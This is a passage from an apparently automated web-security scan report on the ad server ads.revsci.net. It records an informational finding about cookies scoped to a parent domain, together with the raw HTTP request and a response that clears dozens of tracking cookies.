Set-Cookie: rsiPus_uOdh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_t8un=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_UhXN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Yggs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tFKi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_dMCl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_jUrT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_HPp6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_3Us7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_UTqe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_NyfH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_C1HA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_hCo4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5uBS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_mAGT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RObH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_uEcy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xCvN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ebxh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_j_e_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_9mAa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_-4qM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_fMbS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AKta=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pXq4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_g7pa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_zbII=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GEDh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_MRmN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5uiD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JGOr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Kry8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Y6sq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_psQo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JI-L=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_PAkW=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SRnI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_aSXs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_9hcp=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Bq8b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_lww9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_n6fk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__KA3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_YeNy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Pk3I=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_65qD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wuxR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_l77R=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GQV0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2jdP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_7SED=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_o_3Q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_PtS0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_p1rh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_-lLI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_lfkx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yt-D=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_KhUr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_LqXQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Vodh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_r94O=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_0rr2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RAwv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AHDy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_moDT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_7bUe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_UF3V="MLtXrlEusS9roBD3ElioJsiF6sySUVfem3F3zgv5P+XsmyQaJ+0k7MGOSKJRnNlEyGtzHzk5mDju5hlW5NwWJNSy3FWGQChLCmu5FMT9Fpo1Qcv041wsRTflypSLkJ9eQVhctxoj+x1apTdBCWH42nprnPYbIoWxazGLrb/KD+A5h23Q0hhqnxgFbPS1+lDgrNtLaBhIM2vP3nBqmfmrq1mj+YZOVMIzdjtBBdiMduSHmogIVaKDrQjT5pWjfsXtP6NGQRew48EHjwAjj9+t2ahbA5RGrgTOQjNT/WZbiGxd3KiLH2//jU2CDyuU"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJT+nPwIU1E3iQFs1r+MwYFC/diQV0kvz1kXs5mm0b3NdNCaOJe4OMJnDsXCU/hoHR2Abd2814IP+LIsrai4Yeh5Y0b3GwI4FFOSN1pRQxzRy73LRLfWWczJlclKL0YNSVo4OI3RgHMG1353gA+Hdp4ovXbfdxfWv1Ykr1+sCStqlQSeDxIQQumHRevQ4SeMBODBch2StTKbY2p5nlakA9re0+3BYs0u9gWSSwIbIJkxcG5ogg5E3tctFd4ReQGR8KRyvC2x+KBCDqcekX89iIvSozn8HiXJFmHHE8NEO4/G/KdZ4ff0JA8T4Ns7xfEx3pY/7Wt2Ka+vWmG33A2ZKoTSIISDcv+LD6tT4NDiXv9Q9BNVPgnMb8XATn5qdr8B0D/F1FCSeVU43iTFd1mC4TuTJftcD/tLlKJ4jmc6hI5Npr9OrUSP52wZe2wowk5xduhRsMYjWHa8sZNT/dZFkt88Ur9WOL+BtORTARMAsRYu07WlIbycCqF6vvDaGzoV7mmDYvyM36GYYVHm7vA97cCzmm6IVzvvI7ycJ+epIsWZ6d06Ef1Aw0GEEJMdoGTSmI/l3n7FBpb6t6wCom+EmxAZUpePMxG7dr1Ub81+ViLpEMDWKnZs6O0QPFj/3MNG2ZbiCMMzG4XfB9FLf6spCLQI7T1XUr0XWWETCpu86hDI21eINnnsXn6SeFYsT9eVs0XJgaxEUuIf0mSjMrOz9mHfpLVpxt/RS/SeaCsdix7dv7hRcKjm3ARs9Qyb5nQsCmKf9dBR800OsZgIsYGSF5Ust4vDhmMds4TifQL15E+hDyvfMEO+XuMXKnVam3C/mFzIhO9jPkTqcROZyhbhYldHgHUGcds48vJS469Z0JxkwGELcG35QWwIalJEG"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:43:01 GMT

GIF89a.............!.......,...........D..;

13.11. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsiPus_AzD0="MLtXrtUvti9nIDH3PvyuJZDWPvAb5rmAROC1vV+97tGjIq0KICE6IXNJpXbbtXk7SFglqytuSSifpijZkG/o9jHBIRbD9dvmp0CQ7vRdyOFH4TmnC/4OArLBdE8Hqi6o6R2PN9CCY2j1ylbdUwMYvE2vn/8yQK49ZcC2BmYHlP5TqASUaNd3SmSsruJoVhwue8QJ2Wq/HYRhwLuv+SBJuvZlzZ8Srsq2sIZOUsy2XdRmTdXJvYqRxcA7T88WNgvlk/lLSPEabgD9zqVd1+fJjSdNkIpDyzWJ1qz4xbxiA5hGMbHmUcIm4ZmDiZQ0lI1uhSsiwQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMdJT+DPwIU1E3iGYqC+OknDNarDzE9m/tXM2y5OlYSamN+F+xfdu44vAK1LW9qi2ENBLyeepZhpAoNnAZwwWk7okoNeM6hnY4FDeSFdjLp9DlTHNdGEjk0NgfVVxKB0nEnvngZcDTqBTlUIwh2pwKZacn4hm9cIGhFcXIXBU6SBmPbJnKmYxv/0p5EDN4nttB7hb1PTJwj/3mBGjNllA12sUjy7QOOdLxfEl6GmDjn/ZexM7I/fPI8ijGMSHLODlMOfrBlcpc/EVLjRSLRI8xjjkWUcghoozYMgm/2kBMR53HBmxFjQP21MJ6qziGy5KFhz2qPm8ZgoK1+g0XpR3Kmq3TMLtl541XiOq/36oUo4MMjpuSJ2y6bPEnEG4RNytq5QtjHrtihooQg0m/lM9wDkKucEZSkzX6We4wXeCOgPS/A7BkgZy4dkUCe4edTyMDn8fmzBehL604nI2WXe85cUQ528Q14Mxu+aNOLf9YTzBvNBA1KAIjb0O0Oi+VN4FyjgQ40clMB9mqvwoFps3YOlPjPNsS2F22gQ0ivIIHmWn30Wq88O2srD/dCkj0Oq6ZssNV3f5ACcOIA0D6ZRxJO4Y/m8AWjXZYq4CFnEAlfd0xA70nDa0Q06zNeeQaAGZwXSyRBT0sY9Sei6BdID8JWlG406zH6X+6a+fgW0oipqwWFEsM5sQFrrGzszpRAm1U1sBdJZ2TSEDKubr3jIuyeiHnV6czpfJN1f8orwva/UxRbG+LRbtTY2aEs6IY/TFsITJhj8EcKApWf9WLDkqxqP9jKe9KyQx0p8UjOe+FaH0SYBdgFXAEYUAyiJn6mQbIXwpc07tmy/OujBCnSzBh9l3JW67FffY5JV4bQSgkB8PsS+t2xidb1ikY/pSzxxHBee0GB"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=I07714 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; rtc_96sc=MLuBu6yht4kWQAcYCwq3qtH/Je30l0vQIMllZLMTR5d1cXDbc3eX0XFkPieoml1m03ilSbH+UDzM8ahhkwNRJIjsQekY9SHhEfoErML/TD+1N5BDdk6/B/CvX3bhGLQ3s1uvTJFu6bmlGXFRddc7Q88DyqOsfDVBczaNqEk18Dy7B57guB8dm9vx5I0cfvoTdC2UdNz5S6FBXbz04N3YbbmMXAQ6Wt+0OLHhHUU7KFucwXqAEdNCXxVHVGOHllgcS6HqmtQ1oHhumx0AWg==; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; rsiPus_Dp_w="MLtXrlEusS9roBD3MlioxsCF6sySUVfem3F3zgv5P2X5MNBz5u04Ie9ppXXLTNPCB8Rrdx21qWPBSMqTbO6HYwOXUoBWKm6QOeSxGzfdhIMqVpPipkbUdAcWiVJ3Cs4I2Yz+rbqR1Q7yacm6q3MhEYBqZRDVrlm4AttvllcDwygEvV4iEIdzZhutP2QInp8og4OZ+W7c9zRxnI1sZ/yaqTmrtGc5HBE/XipCAr9aBtIFqw2goGxwgKUjJ3So+TW+W8qspjGdsu4/t7OLlio5pcMR2nwhP2uILD3LHj7kAvztOgnn3xZhVKkQvKI+Vg=="; rsi_us_1000000="pUMdJUmDOAIc1Q0ENSCDHVk4pjdq6b0TLtFdvnHKs0j7W4YV0vweki0TaUSmsSdBEZG4Enk584PQv5/vjBqnjvbwpkJAobtE4AP9z/0tXARcQ7ZZijwyIuTEFzcVEMLj3elLwqn/hlqZfkJgsqqK2qxsvxRys6JyaqJ9LAtcxtGJYC+OHMgq6r+wXwzYpuZ4cdvHF9REShwDNkt9b46MQRiRbAAAUOolwwBR6iHLNfgbWGjfFCw9vrOYPyp0bm2NgxIGZYnntLNsQPAd1frsowREiumlBdBctjsBSPfpMdwOxHFh8fMVgEe0q6vZcmheSykvCAoVGRpIu4K5gUqyF2qmq3R8T/t0ZpRi+jIz9mO/PSWtabscmfQQTTUyFzjAcip3jsDYyqQdl4l+0gDVMlxWN8+ALpubLzgPufmKORSg5ZPV4T1sblaP66xnaIJD6DDyLlE8anHysteylSzQ+dZIG0Kr5glQARAqp4NJwTzOjmrj4wFQ/mt30K0RyTpXC+k5uOXxPSRh9tgFdQOaVED0iTNnqa4JSVf+r5/RnL55Ycre4AJZ62QUPNU1r8PZazfaHpQRo4hfBUOiy47VxRcrwkUU8TBN1sF1mFwnVQLNOTzo3iVaWpfL8TyQ2SwKJ4aZQI5U/KNDojZwOfVE8dq4OI/WVxAPVwjaGCRq1tUsGo7R9eMlJjP8d1HWyA5NRiL/oo9Ig0XWMPIeqH2+OvxWiGIHUzhUe3gtByb0N725e6mgtuIuvLXEl5oDRy/ydo6M5uSntsoIHJXCBmVyclUzOdG8ZHIwnqInio4tJdYSfUGV4TankJNlBeg6RFi7IQu0to3CNm5WuGkOpe4Se7aNUuAz/A9ZNu+vBbRxNMh+5LsffYa51MqtkJuw7UU="; rsi_segs_1000000=pUPFeknF7gMYF1JYvJuXopO09a420jnOKLfHaVwoHNgwnmKsDTMJ3YH2aKvvUGIZ/ovnvZQpXcibMPPd7DErWPCzXoGmdIFqM4kSkqVY4gx2tb55vuBU6xY7+voByvYres1JgvnVBK1tOVdIEKTEh5zeeSJ3c6azfwNbivbJs+KlZnQ2c6UCUEdoIjrmao/eYXYcDa0NTi8RdBX3aGM8/aQQvvQ=; udm_0=MLv381MJZihrpr4pFtGoS+vQxWHDxijKIfA0nD1YXO8rJ/xUCrr55GtB6tH+GLXHEIQDRgAUsgpjb8Qra3p01ss8sfNs7AbtWw1NMQHbVuHPxDryQTQWihnYn6mP+qW7rJmsUh6JMJetp9XETN/owC1QhOX+6P7c+4riWzBhBBh0hHlQH0Mljz11bOQQy9Po8Tkt4PBjMGKr1Bfz/My2nRuK7D8C6g9uO0ZdIfyxv6GSjZyInaiZGtamS+7APFob9OU4D23sBW1SwUMD/ds2xnVIonlibiNzi17a2Ci3cn7RNBynKV68utYh0Ovmqr8c1tzfmqX4M2kB+/s7Vy40QxV9eDcyPv7QD2ZZMP07MjwVzu7udeJOT3iLHqAcVBo7UzkvOQovXwg7LkXZVvP1mraXg37hy1xUW9h5fCe5b9lSBlAtX2RjJNd5Kw/DAkI9jR+sOwx5I7QhIO08XzQPAbHeq4X/4/G0hBZxKEA2Dct7ZBd0mftbvhhLi6d9lWU1WG1lXuk4y9NKwM0va2Xyz1Lw09OQZDgIyy1zGMeZrZJg+kwRvgMeIDktJKjBuIf97ZXzLsztk2vWivgmeYpKxJ4wDUGU0S3gU3ABHH8jewoHoUlhxqkQ8jkYD7qVT3LNbOp3PtSUgFgciO/JNV+meBiEZQothOKfU9FUkikghycwnLz4dZuMaSAN/NiLtCNgyxyFJ1pETrJ2iDIwVq101NqbmoFi5OtWvxLh+LOggQVGUKjrcv23bOh6jKQKA8zm/ZYtlTuIqd29QjhV72qNCBkQ0CSsYM/3t7TWnuY9MyASx/5TAztlXKLOg1CAtnJp6ROGov+uw97/AjXH5vzpzlW3bxeSnTaVnDLl5KfroKP5t54TABTyBmMfFNAgoKocMu1r1A0by7U0KerVjRkpDPYNv+su9A5dE4Scx2rJSZTQhGqljz7gnt6TmRr/GY3c4ui3vQztSENzi19mPoa0Q3nd4G8BNsuMvXYo5lUc/gzYQhq5MSpuRIP/Y5jCxpM=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Dp_w=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gdim=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LRgg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-Jfi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bTBF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bEm6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VfeO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_YqeU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5Dgt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_PHh7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_R5ta=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_sB-Y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LIlC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_rEo0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LVUM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ig3D=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5dcS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dZVt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nZdO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jrA8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-EDR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LfdY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_w3Ik=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2hxF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_s6i9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qpw9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9q7G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_X_m0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-vTc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zi3a=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_EVuz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hG-O=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3uh_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ed-o=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DgP-=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_IyHz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9wJ3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3AjH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_OeQh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_oJJI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_IKnw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_FRRz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Z-ZL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BlDK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Uce7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hYlJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tvYV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_N2Wc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Xwgv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NpBx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_7yN0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5ytn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_R0nn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jHB4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Tbod=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dJ-5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tZle=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tAk2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2wEa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GcnD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dTlc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RcWU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mv19=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nBsJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cIpx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qQG7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TK1Q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ebC_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
